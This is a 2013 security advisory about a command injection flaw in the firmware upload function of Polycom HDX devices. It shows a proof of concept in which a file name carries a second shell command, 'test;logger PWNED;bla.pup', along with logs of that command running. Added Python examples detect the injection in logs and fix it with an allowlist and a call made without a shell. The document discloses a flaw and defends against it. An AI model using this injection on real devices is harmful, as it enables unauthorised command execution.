
Polycom Firmware Update Command Injection

Posted Mar 15, 2013
Authored by Moritz Jodeit | Site nruns.com

The firmware update functionality in the Polycom web interface is vulnerable to a simple command injection vulnerability which allows an attacker with access to the web interface to execute arbitrary commands on the underlying embedded Linux system. Polycom HDX series versions prior to 3.1.1.2 are affected.

tags | exploit, web, arbitrary
systems | linux
SHA-256 | eaeed66e6e35211d5de8494085612d6cabc696df21d84244931e4cb825cb4492

n.runs AG
http://www.nruns.com/
security(at)nruns.com
n.runs-SA-2013.002
15-Mar-2013
___________________________________________________________________________
Vendor: Polycom, http://www.polycom.com
Affected Products: Polycom HDX Series
Affected Version: < 3.1.1.2
Vulnerability: Polycom Firmware Update Command Injection
Risk: MEDIUM
___________________________________________________________________________

Overview:

Polycom HDX systems can be upgraded via Polycom Update Files (PUP files).
The upgrade functionality is available in the Polycom administrative web
interface.

Description:

The firmware update functionality in the Polycom web interface is
vulnerable to a simple command injection vulnerability which allows an
attacker with access to the web interface to execute arbitrary commands
on the underlying embedded Linux system.

When uploading a PUP file via the web interface the file is first stored
on the device and then the filename is passed as an argument to a call
to the "puputils.ppc" binary in order to verify its integrity. Missing
input validation allows an attacker to inject additional shell commands
by using shell metacharacters (such as a semicolon). In order to mount the
attack a valid PUP file can be renamed as follows:

$ mv polycom-hdx-release-3.0.5-22695.pup 'test;logger PWNED;bla.pup'

When this file is uploaded through the web interface the injected command
"logger PWNED" is executed on the system. This can also be observed in
the logs:

2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: Welcome to the PUP Utilities.
2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: Verifying the integrity of the PUP file "../web2/docroot/data/test"
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: Unable to open file "../web2/docroot/data/test".
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: CalculateFileSHA1 on pup file failed
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: Unable to open file "../web2/docroot/data/test".
2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: returning PUP_ERR_FILE_CANT_ACCESS
2012-09-02 20:17:01 INFO root: pwned
2012-09-02 20:17:01 INFO jvm: pc[0]: system_pthread: ./puputils.ppc verify ../web2/docroot/data/test;logger pwned;bla.pup [32512]
2012-09-02 20:17:01 ERROR jvm: pc[0]: softupdate: command "./puputils.ppc verify ../web2/docroot/data/test;logger pwned;bla.pup" returned unexpected error 127.
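
The log excerpt above doubles as a detection source. The following is an added example, not part of the original advisory: it scans for the two jvm messages that record the command string and flags any that contain shell metacharacters. The last sample line is constructed for contrast, and its format is an assumption.

```python
import re

# Log lines from the advisory (wrapped lines rejoined), plus one constructed
# benign line (the last) for contrast.
SAMPLE_LOG = [
    '2012-09-02 20:17:01 INFO root: pwned',
    '2012-09-02 20:17:01 INFO jvm: pc[0]: system_pthread: ./puputils.ppc verify '
    '../web2/docroot/data/test;logger pwned;bla.pup [32512]',
    '2012-09-02 20:17:01 ERROR jvm: pc[0]: softupdate: command "./puputils.ppc '
    'verify ../web2/docroot/data/test;logger pwned;bla.pup" returned unexpected '
    'error 127.',
    '2012-09-02 20:21:44 INFO jvm: pc[0]: system_pthread: ./puputils.ppc verify '
    '../web2/docroot/data/polycom-hdx-release-3.0.5-22695.pup [0]',
]

# The two jvm message shapes that record the command string handed to the shell.
COMMAND_RE = re.compile(
    r'system_pthread: (?P<spawned>.+) \[(?P<wait_status>\d+)\]$'
    r'|softupdate: command "(?P<failed>.+)" returned unexpected error (?P<exit_code>\d+)\.$'
)
# Characters that let a file name start a second command or a substitution.
SHELL_META_RE = re.compile(r'[;&|`$<>]')


def find_injected_commands(lines):
    """Return one finding per logged command that contains shell metacharacters."""
    findings = []
    for line in lines:
        match = COMMAND_RE.search(line)
        if match is None:
            continue
        command = match.group('spawned') or match.group('failed')
        if not SHELL_META_RE.search(command):
            continue
        if match.group('wait_status') is not None:
            exit_code = int(match.group('wait_status')) >> 8  # wait status -> exit code
        else:
            exit_code = int(match.group('exit_code'))
        findings.append({
            'timestamp': line[:19],
            'segments': [part.strip() for part in command.split(';')],
            'exit_code': exit_code,
        })
    return findings


if __name__ == '__main__':
    for finding in find_injected_commands(SAMPLE_LOG):
        print(finding)
```

Both flagged lines decode to exit code 127 (32512 is 127 shifted left by eight bits), the shell's "command not found", which is what running the trailing `bla.pup` segment as a command would produce.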

Impact:

Someone with access to the Polycom administrative web interface can
execute arbitrary commands on the underlying embedded Linux system.
In combination with some other vulnerability such as a Cross-Site
Request Forgery vulnerability this attack could potentially be
performed even without direct access to the web interface. However
we didn't verify that yet.

Solution:

Polycom released version 3.1.1.2 of the HDX software which fixes this
issue. It can be downloaded from the Polycom Support page at
http://support.polycom.com.
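
The advisory does not describe how version 3.1.1.2 fixes the issue. As an added example (not Polycom's code), the usual way to close this class of bug is to validate the uploaded file name against an allowlist and pass it to the verifier as a single argument, without a shell. The allowlist pattern and the stand-in verifier are assumptions.

```python
import json
import re
import subprocess
import sys

# Assumed policy: update files carry plain names ending in .pup.
SAFE_PUP_NAME = re.compile(r'[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.pup')

# Stand-in for ./puputils.ppc (assumption): prints the arguments it receives as JSON.
STAND_IN_VERIFIER = [sys.executable, '-c',
                     'import json, sys; print(json.dumps(sys.argv[1:]))']
UPLOAD_DIR = '../web2/docroot/data'  # path as it appears in the advisory's log


def is_safe_pup_name(name):
    """Allowlist check: reject anything that is not a plain *.pup file name."""
    return SAFE_PUP_NAME.fullmatch(name) is not None


def build_verify_argv(name, verifier=STAND_IN_VERIFIER):
    """Return the argument vector: one list element per argument, no shell string."""
    return [*verifier, 'verify', f'{UPLOAD_DIR}/{name}']


def args_seen_by_verifier(name):
    """Run the stand-in without a shell and return the arguments it received."""
    result = subprocess.run(build_verify_argv(name), capture_output=True,
                            text=True, check=True)
    return json.loads(result.stdout)


def verify_upload(name):
    """Reject unsafe names first, then invoke the verifier without a shell."""
    if not is_safe_pup_name(name):
        raise ValueError(f'rejected upload file name: {name!r}')
    return args_seen_by_verifier(name)


if __name__ == '__main__':
    hostile = 'test;logger PWNED;bla.pup'  # file name from the advisory
    print(is_safe_pup_name(hostile))       # rejected by the allowlist
    print(args_seen_by_verifier(hostile))  # still one argument when no shell parses it
    print(verify_upload('polycom-hdx-release-3.0.5-22695.pup'))
```

Either control alone stops the injection shown in the advisory; using both keeps the verifier safe if the allowlist is later relaxed.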
___________________________________________________________________________

Credit:
Bug found by Moritz Jodeit of n.runs AG.
___________________________________________________________________________

Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
security@nruns.com for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded.
In no event shall n.runs be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages, even if n.runs has been advised of the possibility of
such damages.

Copyright 2013 n.runs AG. All rights reserved. Terms of use apply.